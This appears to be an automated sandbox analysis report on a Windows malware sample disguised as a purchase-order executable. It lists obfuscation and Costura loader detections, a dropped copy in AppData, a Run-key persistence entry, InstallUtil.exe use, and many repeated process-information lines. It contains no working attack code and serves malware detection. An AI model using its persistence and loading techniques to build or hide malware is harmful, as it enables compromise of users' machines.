Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1316499062.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1544555962.00000000037B8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1316499062.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1544555962.00000000037B8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1315295077.0000000005850000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5b90000.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5920000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1409827566.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1315698020.0000000005920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1290774383.00000000025E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1515623045.00000000027F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 8044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 5428, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_00D2B049 push ebp; retf	0_2_00D2B04A
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05802E9C push esp; retf	0_2_05802EA8
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05847D31 pushfd ; iretd	0_2_05847D3E
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05847C75 pushfd ; retf 0000h	0_2_05847C7A
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05AFA9DB pushad ; iretd	0_2_05AFA9E1
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05B0C48D pushfd ; iretd	0_2_05B0C48E
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05B11CD0 push eax; ret	0_2_05B11CD1
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Code function: 0_2_05C935B4 push ebx; retf	0_2_05C935BA
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EE7D31 pushfd ; iretd	10_2_05EE7D3E
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_05EE7C75 pushfd ; retf 0000h	10_2_05EE7C7A
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06196D87 push es; ret	10_2_06196D90
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_06199867 push es; retf	10_2_06199868
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_0619A9DA pushad ; iretd	10_2_0619A9E1
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061A04F1 push es; iretd	10_2_061A04F8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061A217A push es; retf	10_2_061A2180
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_061B1CD0 push eax; ret	10_2_061B1CD1
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 10_2_063335B4 push ebx; retf	10_2_063335BA
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DA2EA7 push esp; retf	13_2_05DA2EA8
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DE8131 pushfd ; iretd	13_2_05DE813E
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05DE8071 pushfd ; retf 0000h	13_2_05DE807A
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F5A9DB pushad ; iretd	13_2_05F5A9E1
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F67107 push ebx; ret	13_2_05F6710A
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F71CD0 push eax; ret	13_2_05F71CD1
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F7F0E5 push 8B0381FDh; retf	13_2_05F7F0EA
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_05F7F252 push 8B0381FDh; retf	13_2_05F7F257
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Code function: 13_2_062335B4 push ebx; retf	13_2_062335BA

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

File created: C:\Users\user\AppData\Roaming\Iujcy.exe

Jump to dropped file

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Iujcy			Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Iujcy			Jump to behavior

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
